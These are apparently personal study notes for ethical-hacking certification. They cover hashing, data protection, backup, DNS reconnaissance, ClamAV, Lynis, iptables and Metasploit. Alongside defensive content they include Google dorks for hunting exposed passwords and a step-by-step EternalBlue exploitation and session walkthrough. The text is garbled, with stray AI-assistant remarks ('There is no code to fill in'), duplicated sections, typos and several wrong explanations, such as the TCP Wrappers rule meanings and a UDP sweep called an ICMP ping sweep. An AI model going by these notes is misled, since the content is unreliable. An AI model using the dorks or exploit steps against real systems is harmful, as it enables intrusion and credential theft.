Here’s an updated comparative table that includes multiple hashing algorithms, including the previously mentioned SHA-1, SHA-256, and MD5, as well as other commonly used hash functions like SHA-512, SHA-3, and BLAKE2.

Additional Notes

1. Security Vulnerabilities: SHA-1 and MD5 are considered obsolete for secure applications due to vulnerabilities (collisions, preimage attacks, etc.). SHA-256 and SHA-512 are part of the SHA-2 family, while SHA-3 represents the latest standard, designed to address some of the weaknesses of its predecessors.
2. Performance: While MD5 is the fastest due to its shorter output size, it should not be used for security purposes. BLAKE2 is designed to be faster than MD5 while still being cryptographically secure.
3. Usage Recommendations: For secure applications, prefer SHA-256, SHA-512, SHA-3, or BLAKE2. The choice may depend on the specific performance and security requirements of your application.

Password

HAsh

Cryptography Tools

Here’s a structured table summarizing the key points regarding security concepts mentioned:

Main components of PKI

• The certificate authority (CA)
• The registration authority (RA)
• The certificate database
• The central directory
• The certificate management system

Data Security Control

• Data-at-rest
• Data-in-Use
• Data-in-transit

IAM solution

• maintaining credential
• managing data access
• implement zero-trust framework
• multi-factor authentication
• third-party vendor management
• quick response to security events

Flow Control

Flow control mechanisms are essential for managing data transfers and protecting sensitive information from unauthorized access, breaches, and ensuring compliance with regulations.

Data Encryption

Summary

• OTFE focuses on real-time encryption and decryption processes during data access.
• Transparency describes the seamless integration of encryption methods into everyday operations without disrupting user experience.
• Disk Encryption refers specifically to the technique of encrypting physical storage media to protect data at rest.
• File Encryption allows for selective protection of specific files while leaving others unencrypted.
• End-to-End Encryption (E2EE) ensures that only the communicating users can read the messages, protecting data from intermediaries.
• Transport Layer Security (TLS) secures data in transit over networks, preventing interception and tampering.

These additional concepts provide a broader view of the various encryption methods and their applications in data security.

DLP

Here are the updated tables, including additional tools like Digital Guardian, Fidelis, Clumio, and other popular options, while keeping the information concise.

Data Security Strategies

Tools Comparison

Conclusion

Selecting the right data security strategies and tools is crucial for protecting sensitive information and ensuring compliance. By leveraging a combination of strategies like DLP, encryption, and user monitoring, along with robust tools such as Imperva, Check Point, Digital Guardian, and others, organizations can create a comprehensive security framework. Regular assessments and updates to security practices will help address emerging threats and evolving compliance requirements.

BCDR (Business Continuity and Disaster Recovery) Solutions are critical components for organizations to ensure their operations can continue effectively during and after a disruptive event, such as natural disasters, cyberattacks, or other crises. Here’s a breakdown of BCDR solutions:

Key Components of BCDR Solutions

1. Business Continuity Plan (BCP):

   • Definition: A BCP outlines procedures to maintain essential functions and operations during a disruption.
   • Focus: Ensures that critical business functions can continue with minimal downtime.
   • Components:
     • Risk assessment and business impact analysis.
     • Identification of critical services and systems.
     • Communication plans and designated roles.
     • Recovery strategies for maintaining operations.

2. Disaster Recovery Plan (DRP):

   • Definition: A DRP focuses specifically on restoring IT systems and data after a disaster.
   • Focus: Recovery of technology and data infrastructure.
   • Components:
     • Backup procedures for data and systems (on-site and off-site).
     • Recovery time objectives (RTO) and recovery point objectives (RPO).
     • IT asset inventory and prioritization of recovery.
     • Testing and updating the DRP regularly.

Types of BCDR Solutions

1. Data Backup and Recovery Solutions:

   • Automated tools and strategies for backing up data regularly and restoring it quickly in case of loss.

2. Cloud-Based BCDR Solutions:

   • Leverage cloud services for data storage and recovery, allowing for scalable and flexible recovery options.

3. Hot, Warm, and Cold Sites:

   • Hot Site: Fully operational backup site with real-time data replication, ready for immediate failover.
   • Warm Site: Partially equipped site with some resources in place, requiring some time to become fully operational.
   • Cold Site: A backup site with minimal infrastructure in place, requiring significant setup time.[H3]

4. Virtualization:

   • Using virtualization technology to create virtual servers and environments that can be quickly restored or replicated elsewhere.

5. Failover Solutions:

   • Automatic switching to a standby system or network upon the failure of the primary system, ensuring minimal disruption.[H3]

Benefits of BCDR Solutions

• Minimized Downtime: Provides a clear pathway to restore critical operations quickly, reducing the impact of interruptions.
• Data Protection: Safeguards vital business data against loss due to disasters or system failures.
• Regulatory Compliance: Helps organizations meet legal and regulatory requirements regarding data protection and operational continuity.
• Improved Customer Confidence: Demonstrating preparedness for disruptions can enhance customer trust and loyalty.

Conclusion

Investing in a robust BCDR solution is essential for organizations to navigate risks effectively and maintain operational resilience. A well-structured approach to business continuity and disaster recovery can ultimately safeguard an organization’s assets, reputation, and long-term sustainability in the face of unexpected events.

RAID (Redundant Array of Independent Disks)

RAID is primarily focused on data redundancy and performance, rather than traditional backup strategies. However, backup retention policies can be influenced by how RAID levels protect data.

Key Points:

1. RAID is not a Backup Solution: RAID levels provide redundancy and improve performance but do not replace backups. Regular external backups are still necessary.
2. Backup Retention Policies: Should be developed based on the level of redundancy provided by RAID and the criticality of the data.
3. Data Availability vs. Retention: Consider how quickly you need to restore data (availability) versus how long you need to keep historical data (retention).

Always ensure that you have a comprehensive data protection strategy that includes both RAID configurations and regular external backups.

Data backup retention

MSP360

Backup features a Retention Policy that allows users to automatically create and delete copies of files, referred to as versions. Users can create multiple versions of a file based on their security settings.

RAID

Redundant Array of Inexpensive/Independent Disks is a data storage virtualization technology that combines multiple physical disk drive components into logical units for data redundancy and performance improvement. It differs from the concept of “single large expensive disk” (SLED). Data is distributed across drives in RAID levels, which balance reliability, availability, performance, and capacity. not fault tolerence in RAID 0[H1]

Specific search engines

Netcraft, Wappalyer, Builtwith.com, Shodanhq

Search engines that specialize information about people

Pipl

[T3]

Showing IOT devices with port of 80 and searchterms to filter records.

• Shodanhq

• metasploit
• scanPBNJ
• google

• Exploit-DB

Searching keyword Samba and port 139. [[exploit_db_remote]]

• J. Long, “Google Hacking for Penetration Testers”. Syngress, 2005 • Google search syntax • Filetype:doc filetype:pdf filetype:xls • Intext:. Intitle:, inurl: • Allintext:, allintitle:, allinurl: • Site:gov site:mil site:abc.ro • Related:www.abc.ro • http://www.googleguide.com/advanced operators.html
• Google Hacking Database (GHDB) • http://www.hackersforcharity.org/ghdb/
• Example:

https://www.googleso/search?client=safari&rls=en&q=%22Password%3D%22+inur hweb.config-F-intext:web.config+ext:config&ie=UTF-88toe=UTF-88cgws_rd=cr&ei=SW9KWd2EH4nWU8yDuoAK

curl -I https://ituniversity.ro, I flag is important

search on Goodle: site:pastebin.com yourwebsite.com" password

ExploitDB

Filter & Query:

site.example.com inurl:ftp "password" fileType.xls

Malware

Heuristic analysis [1]

Heuristic analysis is a proactive security approach that aims to detect potential threats/risks and malware by examining the attributes, structure, and behavior of programs rather than relying solely on known signatures of malicious software.

Key Characteristics of Heuristic Analysis

1. Behavioral Analysis: Heuristic analysis looks at how a program behaves during execution. If it exhibits suspicious or malicious behaviors (such as attempting to modify system files or access sensitive data), it may be flagged as a potential threat.

2. Static and Dynamic Analysis: This method can involve both static analysis (examining the code or structure without executing it) and dynamic analysis (running the code in a controlled environment, like a sandbox, to observe its behavior).

3. Sandboxing: Running suspected malware in a sandbox allows security systems to monitor its actions in an isolated environment, helping to identify whether the software is actually harmful without risking infection of the main system.

4. Proactive Detection: Unlike traditional signature-based methods that only recognize known threats, heuristic analysis aims to identify new, unknown threats based on their behavior and characteristics.

Use Cases of Heuristic Analysis

• Antivirus Software: Many antivirus programs use heuristic analysis to detect new viruses or variants of known malware that have not yet been classified.
• Intrusion Detection Systems (IDS): Heuristic rules can help in identifying suspicious network traffic patterns that might indicate an attack.
• Malware Research: Security researchers analyze software to develop more effective detection methods for emerging threats based on observed behaviors.

ClamAV

ClamAV is an open-source antivirus engine designed for detecting many types of malicious software, including viruses, trojans, botnets, rootkits, malware, etc.

Installation and Setup

aptitude search clamav
sudo apt-get install clamav-daemon

Enable and start the ClamAV daemon service:

sudo systemctl enable clamav-daemon
sudo systemctl start clamav-daemon

Updating Virus Definitions

Use freshclam to update ClamAV’s virus signature database:

sudo freshclam

You can specify a daily update schedule in /etc/clamav/freshclam.conf:

sudo nano /etc/clamav/freshclam.conf
# Add or modify:
Check 1

Running a Scan

To perform a manual scan:

sudo clamscan --fdpass

To scan a specific directory:

sudo clamscan --fdpass -r /path/to/directory

To move infected files to a quarantine directory:

sudo clamscan --fdpass -r /path/to/directory --move=/path/to/quarantine

To remove infected files instead of moving them:

sudo clamscan --fdpass -r /path/to/directory --remove

To scan and alert only when infected files are found:

sudo clamscan --fdpass -r /path/to/directory --bell -i

Checking ClamAV Status

To check if ClamAV is running:

ps aux | grep clamd

To view ClamAV logs:

tail /var/log/clamav/clamav.log

Checking ClamAV Alert

This command is useful for quickly checking if there are any infected files in the specified directory without actually removing or moving them. It’s a good way to get an initial assessment of potential security issues without causing unintended changes to your system.

clamscan -r --bell -i /home/path

Finding ClamAV Version

To check the ClamAV version:

clamav-milter --version

This section provides a comprehensive overview of ClamAV installation, configuration, and usage. It covers essential commands for updating virus databases, performing scans, and managing infected files. Remember to adjust file paths and options according to your specific system setup.

Citations: [1] https://docs.clamav.net/manual/Usage/Configuration.html [2] https://github.com/aosm/clamav/blob/master/clamav.Conf/freshclam.conf.default [3] https://manpages.debian.org/unstable/clamav-freshclam/freshclam.conf.5.en.html [4] https://linux.die.net/man/5/freshclam.conf [5] https://docs.clamav.net/manual/Usage/SignatureManagement.html [6] https://aaronbrighton.medium.com/installation-configuration-of-clamav-antivirus-on-ubuntu-18-04-a6416bab3b41 [7] https://docs.clamav.net/faq/faq-freshclam.html [8] https://gist.github.com/1086ae53b7501a8c76b4 [9] https://askubuntu.com/questions/589318/freshclam-error-clamd-conf-file-not-found [10] https://ubuntuforums.org/archive/index.php/t-2422702.html

keywords: nmap,nslookup,dig,fierce,metagoofil,google,exiftool,shodanhq

Using Backtrack tools and commands

Certainly! Below is a table summarizing the use cases of the specified tools:

Data

Generate Data

nmap -vv -O -sS -A -p- P0 -oA nmapScan 127.0.0.1

Detection

Methods of detection

• DSINT هوش متن باز
• Footprint

Types of detection systems

• IDS
• IPS

Detection of DNS records

Like:

• CNAME
• A
• MX

NsLookup

To change default name server to a new ip or name:

nslookup -type=ns example.com 156.154.70.22

Write a script:

nano AutoM8

for HOSTNAME in `cat DomainNames.txt`
do
echo "Getting name servers for [$HOSTNAME]" nslookup -type=ns $HOSTNAME 8.8.8.8
done 

sudo nano ./DomainNames.txt
#
{
example.com
example.net
example.org
}

chmod +x AutoM8
./AutoM8 >NameServerListing.txt
cat NameServerListing.txt

About transfer domain: Zonetransfer.me

Dig is a replacement of nslookup

[T1]

Dig[T1] will use NSs that exists in the /etc/resolve.conf

dig +qr www.example.com any

Any means any records that contains keywords of any.

AXFR

axfr will provide all of the information about a ns.

dig @ns1.example.com example.com axfr

In the output we expect to see all sub domains.

Showing a benificial summery than prior cammands

dig +nocmd +noall +answer example.com

Reverse name by ip

dig +nocmd +noall +answer -x 192.168.0.1

Muiltiple query

dig +nocmd +noall +answer example.com example.net -X 192.168.1.10

Tracing

dig +trace example.com

Categorized

sudo ./nano diginIt.txt
#
+nocmd +noall +answer example.com
+nocmd +noall +answer example.net
+nocmd +noall +answer example.org ns

dig -f diginIt.txt

Attacking to NSs

[S1]

Fierce Tool

To find ip ranges that are not sequential. Default used hostnames are saved in the hosts.txt of installed fierece folder.

cd /pentest/enumeration/dns/fierce
./fierce.pl -h
./fierce.pl -dns exapmle.com

Creating a private list

sudo nano ./myWordList.txt

{ irc mail mail1 testmachine1 testmachine www www1 ns }

./fierce.pl -dns example.com -wordlist myWordList.txt

verfying NSs

Websites:

• AFRINIC
• APNIC
• ARIN
• IANA
• ICANN
• LACINC
• NRO
• RIPE
• InterNic

Gathering data

Penetation to Google

Tools

• ExploitDB with google dorks

Metagoofil

[S1]

Sample:

metagoofil.py -d microsoft.com -t doc,pdf -l 200 -n 50 -o microsodtfiles -f results.html

Use-case:

phyton metagoofil.py -d example.com -t doc,pdf -l 200 -n 50 -o examplefiles -f results.html

Output a list of:

• users
• software
• paths & servers
• emails

# Local dir analysis
metagoofil.py -h yes -o microsoftfiles -f results.html

Tool to find MetaData

Hidden files

• Foca[T3] for windows

Images

./exiftool  t/images/FotoStation.jpg/ppt

of an IP

whois example.com

Whois the name service of registerd a domain?

whois -h whois.apnic.net 192.0.43.10

whois -h whois.arin.net 192.0.43.10 | grep Country:

Footprint Detection

Search Engine

• Showing IOT devices

Http

Showing for example X-Power-By: ASP.NET

nc example.com 80

Table that includes additional similar tools to ScanPBNJ and Metasploit, along with a rating based on popularity, performance, and suitability for the Certified Ethical Hacker (CEH) certification.

Comparison of Cybersecurity Tools

Summarized Ratings

• Popularity:

  • Metasploit and Nessus are among the most popular tools in the cybersecurity domain. Burp Suite and OWASP ZAP are widely used for web application testing. ScanPBNJ has moderate popularity.

• Performance:

  • Metasploit is known for its robust performance in pentesting, while Nessus is highly regarded for vulnerability scanning. Burp Suite and OWASP ZAP are effective for web security analysis, with ScanPBNJ being effective but more niche in application.

• Use for CEH:

  • All tools listed (ScanPBNJ, Metasploit, Burp Suite, Nessus, and OWASP ZAP) can be valuable in the preparation for the Certified Ethical Hacker (CEH) certification, as they cover critical areas of application and network security testing.

Choosing the right tool depends on your specific security requirements, the types of systems you need to assess, and your familiarity with each tool. Tools like Metasploit, Burp Suite, and Nessus are particularly popular in the industry and valuable for those pursuing careers in ethical hacking and cybersecurity.

Sandboxes

Here’s a comparison table focusing on Cuckoo Sandbox and other relevant sandboxing tools utilized for penetration testing and malware analysis. The comparison considers various aspects such as purpose, functionality, ease of use, and integration capabilities.

Comparison of Sandbox Tools

Question 6: What advanced security tools are you familiar with, and how do they contribute to an organization’s security posture?

Answer: I am familiar with advanced security tools like Sandboxes, Endpoint Detection and Response (EDR), and Extended Detection and Response (XDR).

• Sandboxes are crucial for isolating suspicious files to analyze behavior without risking the network.
• EDR tools help in monitoring and responding to threats on endpoints in real-time, providing insights into attacks that have bypassed traditional defenses.
• XDR integrates data from multiple security layers for comprehensive threat detection and response, streamlining management and improving response times.

Endpoint Detection and Response (EDR), and Extended Detection and Response (XDR). Each of these tools enhances an organization’s security posture in distinct ways.

Table: Advanced Security Tools

Summarized Comparison

• Cuckoo Sandbox is a powerful, open-source tool designed specifically for automated malware analysis. It’s ideal for penetration testers and researchers who need to analyze malware in a safe environment. With its API and plugin support, it can integrate with other tools and frameworks, providing scalable and detailed reports.

• Hybrid Analysis is a commercial service that allows users to upload files and get detailed behavioral analysis. It’s user-friendly and suited for quick assessments of malware.

• Any.Run focuses on interactive malware analysis, allowing users to manually control the analysis environment while still providing detailed results. It’s effective for analysts needing to see the live behavior of malware.

• Joe Sandbox offers comprehensive malware analysis capabilities, combining both dynamic and static analysis, and it provides rich reporting features. It is suitable for in-depth investigations of suspicious files.

• Sandboxie operates slightly differently by isolating applications to prevent them from affecting the host machine. This is particularly useful for users who need to run potentially harmful software safely but doesn’t provide the comprehensive analysis features of the other tools.

Each sandbox tool has its unique advantages and use cases within penetration testing and malware analysis. Cuckoo Sandbox stands out for its automation and customization, while other options provide specific features intended for unique scenarios, such as live analysis (Any.Run) or application isolation (Sandboxie). Choosing the right tool depends on the specific requirements, such as the need for integration, analysis depth, and user interaction.

For a comprehensive approach in CEH, leveraging Metasploit alongside Cuckoo[T3] Sandbox is optimal.

Metasploit

Metasploit is a powerful penetration testing framework that provides a comprehensive platform for developing, testing, and executing exploits. It contains a large database of known vulnerabilities, exploits, and auxiliary modules that can be used for security testing and assessment.There is no code to fill in. The prefix contains only text, and there is no code snippet to complete. Metasploit is a powerful penetration testing framework that provides a comprehensive platform for developing, testing, and executing exploits. It contains a large database of known vulnerabilities, exploits, and auxiliary modules that can be used for security testing and assessment.There is no code to fill in. The prefix contains only text, and there is no code snippet to complete. On Kali Linux, Metasploit comes pre-installed. For other systems, you can install it using the following commands:

Architecture

{width=‘200’, height=‘200’, align=‘center’ }

Debian/Ubuntu-based systems

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod +x msfinstall
./msfinstall

Getting Started

To update Metasploit to the latest version and launch the console:

msfupdate
msfconsole

Metasploit is a powerful penetration testing framework that provides a comprehensive platform for developing, testing, and executing exploits. It contains a large database of known vulnerabilities, exploits, and auxiliary modules that can be used for security testing and assessment.There is no code to fill in. The prefix contains only text, and there is no code snippet to complete.## Installation

On Kali Linux, Metasploit comes pre-installed. For other systems, you can install it using the following commands:

Debian/Ubuntu-based systems

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod +x msfinstall
./msfinstall

Since there’s no code to rewrite in the specified section (it’s empty between the prefix and suffix), and the instruction simply says “here”, I’ll assume you want to add content between the prefix and suffix. Based on the context, I’ll add an introductory section about Metasploit:

Installation

On Kali Linux, Metasploit comes pre-installed. For other systems, you can install it using the following commands:

Debian/Ubuntu-based systems

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod +x msfinstall
./msfinstall

Getting Started

To update Metasploit to the latest version and launch the console:

msfupdate
msfconsole

Commonly used Metasploit (MSF) commands

Auxiliary Modules

Auxiliary modules in Metasploit are non-exploitation tools that perform various tasks such as scanning, enumeration, and information gathering. They are useful for reconnaissance and identifying vulnerabilities in a target system.

Example: Running an Auxiliary Module

Scenario: You want to use an auxiliary module to perform a port scan on a target IP address.

1. Start Metasploit:

   msfconsole
   

2. Search for available auxiliary modules:

   search auxiliary
   

3. Choose a specific module, e.g., TCP port scanner:

   use auxiliary/scanner/portscan/tcp
   

4. Display module options:

   show options
   

5. Set the target IP address:

   set RHOSTS 192.168.1.1
   

6. Set the port range (optional):

   set PORTS 1-1000
   

7. Run the module:

   run
   

After executing the run command, Metasploit will perform the TCP port scan on the specified target and display the results in the console.

Here are a few examples of commonly used auxiliary modules in Metasploit, along with descriptions of what they do:

Next Examples

These examples demonstrate how to use different auxiliary modules in Metasploit for tasks such as scanning for open ports, detecting versions, performing DNS queries, and discovering live hosts on a network. Each module usually requires specifying the target (using RHOSTS or similar options) before running the command to execute the desired task.

1. TCP Port Scanner

   • Module Path: auxiliary/scanner/portscan/tcp

   • Description: Scans a range of IP addresses for open TCP ports.

   • Usage:

     use auxiliary/scanner/portscan/tcp
     set RHOSTS 192.168.1.0/24      # Set the target network
     set PORTS 1-1000                # Specify the port range
     run                             # Execute the port scan
     

2. HTTP Version Detection

   • Module Path: auxiliary/scanner/http/http_version

   • Description: Determines the HTTP version used by web servers.

   • Usage:

     use auxiliary/scanner/http/http_version
     set RHOSTS 192.168.1.1        # Set the target IP
     set RPORT 80                  # Specify the port (if not 80)
     run                           # Execute the scan
     

3. DNS Zone Transfer

   • Module Path: auxiliary/scanner/dns/dns_zone_transfer

   • Description: Attempts to perform a zone transfer on a DNS server to obtain information about the domain.

   • Usage:

     use auxiliary/scanner/dns/dns_zone_transfer
     set RHOSTS example.com         # Set the target domain
     run                             # Execute zone transfer
     

4. SMB Version Detection

   • Module Path: auxiliary/scanner/smb/smb_version

   • Description: Detects the version of SMB running on a target.

   • Usage:

     use auxiliary/scanner/smb/smb_version
     set RHOSTS 192.168.1.1        # Set the target IP
     run                             # Execute the version detection
     

5. Ping Sweep

   • Module Path: auxiliary/scanner/discover/udp_sweep

   • Description: Uses ICMP echo requests to discover live hosts on a network.

   • Usage:

     use auxiliary/scanner/discover/udp_sweep
     set RHOSTS 192.168.1.0/24     # Set the target subnet
     run                             # Execute the ping sweep
     

In Metasploit, sessions are created when you successfully exploit a target, often using an exploit module rather than an auxiliary module. Below is a brief overview of how to establish a session and work with exploits to create one.

Example of Establishing a Session with an Exploit Module

1. Choosing an Exploit Module

   • Example Module: Let’s say you want to exploit a known vulnerability in an application running on a target machine.
   • Module Path: exploit/windows/smb/ms17_010_eternalblue
   • Usage:

   use exploit/windows/smb/ms17_010_eternalblue
   

2. Show Options and Set Targets

   • Display module options:

   show options
   

   • Set the target IP address:

   set RHOSTS 192.168.1.100  # IP of the target machine
   set LHOST 192.168.1.50    # Your local IP (attacker's machine)
   

3. Run the Exploit

   • Execute the exploit to attempt to gain a session:

   exploit
   

4. Interact with the Session

   • List active sessions: Once the exploit is successful, a session will be created.

   sessions
   

   • Interact with the session: Choose to interact with the newly created session.

   sessions -i 1  # Replace "1" with the session ID number you want to interact with.
   

Summary of Key Commands Related to Sessions

Auxiliary modules are typically used for scanning or gathering information and do not create sessions, while exploit modules are designed to take advantage of vulnerabilities to establish a session on the target machine. Using the right module is crucial for successful exploitation and session management.

Lynis Audit Tool

Lynis is a powerful security auditing tool that helps assess the security of Unix-based systems. It performs over 300 checks to identify security issues.

Installation and Setup

mkdir /usr/local/lynis
cd /usr/local/lynis
wget https://cisofy.com/files/lynis-2.2.0.tar.gz
tar -xzf ./lynis-2.2.0.tar.gz
cd lynis

Running a System Audit

To perform a full system audit:

./lynis audit system

This command runs a comprehensive set of tests and saves the results in /var/log/lynis-report.dat.

Viewing Audit Results

To view the generated report:

cat /var/log/lynis-report.dat

Additional Commands

• To run a specific check:

  ./lynis audit system --check=CHECK_NAME
  

• To generate an HTML report:

  ./lynis report generate html /path/to/output/directory
  

• To update Lynis to the latest version:

  git pull
  

Configuration

Lynis can be configured through its configuration file:

nano /etc/lynis/lynis.conf

You can enable or disable specific checks here.

Running as Non-root User

By default, some checks require root privileges. You can run Lynis as a non-root user with limited capabilities:

./lynis audit system --non-root

This will perform fewer checks but still provides valuable insights into many aspects of your system’s security.

Best Practices

1. Run Lynis regularly to monitor changes in your system over time.
2. Use the --report option to generate reports that can be easily shared or stored for future reference.
3. Pay special attention to high-priority issues identified by Lynis.
4. Address each issue reported by Lynis to improve your system’s overall security posture.

Remember to always review the generated report carefully and take appropriate action based on the findings. While Lynis is a powerful tool, it should be used as part of a comprehensive security strategy rather than as the sole method of assessment.

Citations: [1] https://cisofy.com/documentation/lynis/get-started/ [2] https://cisofy.com/documentation/lynis/ [3] https://www.youtube.com/watch?v=fUIpJJn6YaM [4] https://www.digitalocean.com/community/tutorials/how-to-perform-security-audits-with-lynis-on-ubuntu-16-04 [5] https://www.tecmint.com/linux-security-auditing-and-scanning-with-lynis-tool/ [6] https://cisofy.com/lynis/ [7] https://www.linode.com/docs/guides/security-auditing-with-lynis/ [8] https://www.reddit.com/r/linuxquestions/comments/1czzovy/problem_installing_and_running_lynis_audit_system/ [9] https://linuxsecurity.expert/training/modules/guides/installation-and-configuration-of-lynis [10] https://www.geeksforgeeks.org/lynis-security-tool-for-audit-and-hardening-linux-systems/

scanPBNJ

scanPBNJ is a network scanning tool similar to nmap but with additional features, including the ability to save information directly into a MySQL database.

# Start by starting the MySQL service
sudo systemctl start mysql

# Connect to MySQL as root
mysql -u root -p

# Create a new database for scanPBNJ
CREATE DATABASE BTpbnj;
EXIT; # Exit MySQL

# Create a user for scanPBNJ
mysql -u root -p
CREATE USER 'tester'@'localhost' IDENTIFIED BY 'password';
GRANT ALL ON Btpbnj.* TO 'tester'@'localhost';
EXIT; # Exit MySQL again

# Create a directory for scanPBNJ configuration files
mkdir -p ./pbnj-2.0

# Copy the default MySQL configuration file
cp /usr/share/doc/pbnj/examples/mysql.yaml config.yaml

# Edit the configuration file
nano config.yaml

# In the configuration file, set up the database connection details:
db:
  driver: mysql
  database: BTpbnj
  user: tester
  passwd: password
  host: localhost
  port: 3306

Now you can start using scanPBNJ:

# Run a scan against a specific IP address
/usr/local/bin/scanpbnj -a "-p- -T4" 192.168.1.1

# After running the scan, connect to MySQL to view the results
mysql -u tester -p BTpbnj

# Once connected, you can view tables and data:
SHOW TABLES;
DESCRIBE machines; # To see information about the 'machines' table
SELECT * FROM machines; # To view all data in the 'machines' table

Explanation of scanPBNJ Usage

1. Installation: ScanPBNJ is installed at /usr/local/bin/scanpbnj. You can run it using the command scanpbnj.

2. Configuration: The MySQL configuration is stored in config.yaml. Make sure to set up the correct database name, user, password, host, and port.

3. Running Scans: The basic syntax for running a scan is:

   /usr/local/bin/scanpbnj [options] <target>
   

   In your example, -a "-p- -T4" sets aggressive options (-a) including port scanning (-p-) and using 4 threads (-T4).

4. Data Storage: ScanPBNJ stores its results directly in the specified MySQL database. After running a scan, you can connect to the database to view the collected information.

5. Database Structure: Typically, scanPBNJ creates tables like ‘machines’ and ‘services’ to store scan results.

6. Querying Results: Once connected to the MySQL database, you can use SQL queries to analyze the scan results, such as viewing all machines discovered (SELECT * FROM machines;) or details about specific services (DESCRIBE services;).

Remember to replace placeholder IP addresses (like 192.168.1.1) with actual target IP addresses when performing scans. Always ensure you have permission to scan the targets before running network scans.

Citations: [1] https://hevodata.com/learn/flask-mysql/ [2] https://docs.newrelic.com/install/mysql/ [3] https://www.elastic.co/guide/en/integrations/current/mysql.html [4] https://www.baeldung.com/java-connect-mysql [5] https://www.digitalocean.com/community/tutorials/spring-mvc-hibernate-mysql-integration-crud-example-tutorial [6] https://signoz.io/blog/opentelemetry-mysql-metrics-monitoring/ [7] https://www.youtube.com/watch?v=_E2-cVna-3M [8] https://learn.microsoft.com/en-us/azure/mysql/flexible-server/overview [9] https://help.scalegrid.io/docs/connect-mysql-to-powerbi [10] https://planetscale.com/

Install

# Installing a gui like C++ IDE for exploring files
sudo apt-get install mc
# User manual helper
man thenameofcommand # like man cat

Terminal Colored Coding

Clean the contents of the file and then replace the contents of the link.

leafpad ~/.bashrc

Colored terminal

Common Commands

# show all path of an installed tool
locate crontab

sudo apt install leafpad
sudo apt install geany

Common commands

Installer

cat proc/version
cat /etc/apt sources.list or sources.list.d
apt-get update
apt-get install npm
apt-get apache2 vim

Modules

*# find /lib/modules/${kernelVersion} -name ip_vs.ko -o -name ip_vs_rr.ko -o -name ip_vs_wrr.ko -o -name ip_vs_sh.ko -o -name nf_conntrack_ipv4.ko
*lsmod | grep ip_vs
modprobe -- nf_conntrack_ipv4 ip_vs_sh ip_vs_wrr ip_vs ip_vs_rr nf_conntrack_ipv4 ip_vs_sh ip_vs_wrr ip_vs ip_vs_rr nf_conntrack_ipv4 ip_vs_sh ip_vs_wrr ip_vs ip_vs_rr

Loop

while true;do curl https://10.10.240.93 -d @rpc/version.json; sleep 1; done
./bin/down
./bin/revert
./bin/up

Service

Enable a service at boot.

update-rc.d ssh enable

Network

Thank you for providing the TCP Wrappers content. I’ll correct and fix errors, elaborate on the commands, and provide explanations for each part. Here’s the corrected and expanded version:

TCP Wrappers

# Check if the SSH daemon is linked against libwrap
ldd /usr/sbin/sshd | grep libwrap

# Navigate to the /etc directory
cd /etc/

# List files in the /etc directory
ls -l | grep hosts

# If hosts.allow or hosts.deny don't exist, create them
touch hosts.allow hosts.deny

# Edit the hosts.allow file
nano hosts.allow

# Add these options, possibly one of them:
sshd, telnet, ftp: 192.168.12.133 DENY
ALL: ALL
ALL: LOCAL
ALL: KNOWN
ALL: UNKNOWN
ALL: PARANOID

# Exit nano
exit

# Edit the hosts.deny file
nano hosts.deny

# Add this line to hosts.deny
ALL EXCEPT sshd: ALL

# Exit nano
exit

# Test SSH access
ssh user@ip

# If successful, test again after modifying hosts.deny
ssh user@ip

Explanation of TCP Wrappers Commands

1. ldd /usr/sbin/sshd | grep libwrap: Checks if the SSH daemon is linked against libwrap, which is necessary for TCP Wrappers functionality.

2. cd /etc/ and ls -l | grep hosts: Navigate to the /etc directory and list files related to hosts.

3. touch hosts.allow hosts.deny: Creates these files if they don’t exist.

4. nano hosts.allow: Edits the file that allows access to services.

5. In hosts.allow, the options mean:

   • sshd, telnet, ftp: 192.168.12.133 DENY: Denies access from the specified IP address for SSH, Telnet, and FTP services.
   • ALL: ALL: Allows all services for all clients (this overrides more specific rules).
   • ALL: LOCAL: Allows local connections.
   • ALL: KNOWN: Allows known hosts.
   • ALL: UNKNOWN: Allows unknown hosts (use with caution).
   • ALL: PARANOID: Allows paranoid mode (blocks packets without source IP).

6. exit exits the nano editor.

7. nano hosts.deny: Edits the file that denies access to services.

8. In hosts.deny, ALL EXCEPT sshd: ALL means deny all services except SSH for all clients.

9. ssh user@ip: Tests SSH access before and after modifications.

TCP Wrappers work by reading both /etc/hosts.allow and /etc/hosts.deny files in order. The first matching rule determines the outcome:

• A match in hosts.allow grants access.
• A match in hosts.deny denies access.

If there’s no match in either file, access is granted by default.

Remember to restart affected services after making changes to these files for them to take effect. Also, be cautious when using wildcards and broad rules, as they can potentially lock you out of your system if not configured correctly.

Curl

• Using curl command to ckeck status of ‘Access-Control-Allow-Origin’

curl -I -X OPTIONS \                                                                                                                              
  -H "Origin: http://192.168.33.18:4000" \
  -H 'Access-Control-Request-Method: POST' \
  'http://192.168.33.18:4000/api/contact-us/message' 2>&1 | grep 'Access-Control-Allow-Origin'

curl -X POST http://..com -d '' | grep x | wc –l

Iptable

In iptables, the terms “DROP” and “REJECT” refer to two different actions that can be taken on packets that match a specified rule. Here’s a breakdown of the differences along with the states that include these actions:

Difference Between DROP and REJECT

Packet States in iptables

In iptables, rules can be defined for various states of connection tracking. The states are usually as follows:

Summary of States with DROP and REJECT

When configuring iptables, you can specify rules based on these connection tracking states. Both DROP and REJECT can be used in conjunction with any of these states, but you would typically use:

• DROP for connections you want to ignore completely (e.g., due to security policies).
• REJECT for connections where you want to communicate that the packet is not allowed (helpful for debugging or user feedback).

IP Table Commands

netsh

netsh interface portproxy add v4tov4 listenport=35999 listenaddress=0.0.0.0 connectport=80 connectaddress=0.0.0.0

netsh http delete urlacl url=http://*:35999/ user=Everyone

netstat

service ssh start
netstat -antp|grep ssh

Mac Address

Show:

arp -a

IPTables

# List all IPTables rules without numerical output
iptables -nvL

# Add a rule to reject packets from a specific IP
iptables -A INPUT -s 192.168.12.139 -j REJECT

# List all IPTables rules with line numbers
iptables -L --line-number

# Delete the first rule in the INPUT chain
iptables -D INPUT 1

# Verify the changes
iptables -nvL

# Replace the first rule in the INPUT chain with an ACCEPT rule
iptables -R INPUT 1 -j ACCEPT

# Verify the changes again
iptables -nvL

# Save the current IPTables configuration to a file
iptables-save > /etc/iptables.conf

# Restore IPTables rules from the saved file
iptables-restore < /etc/iptables.conf

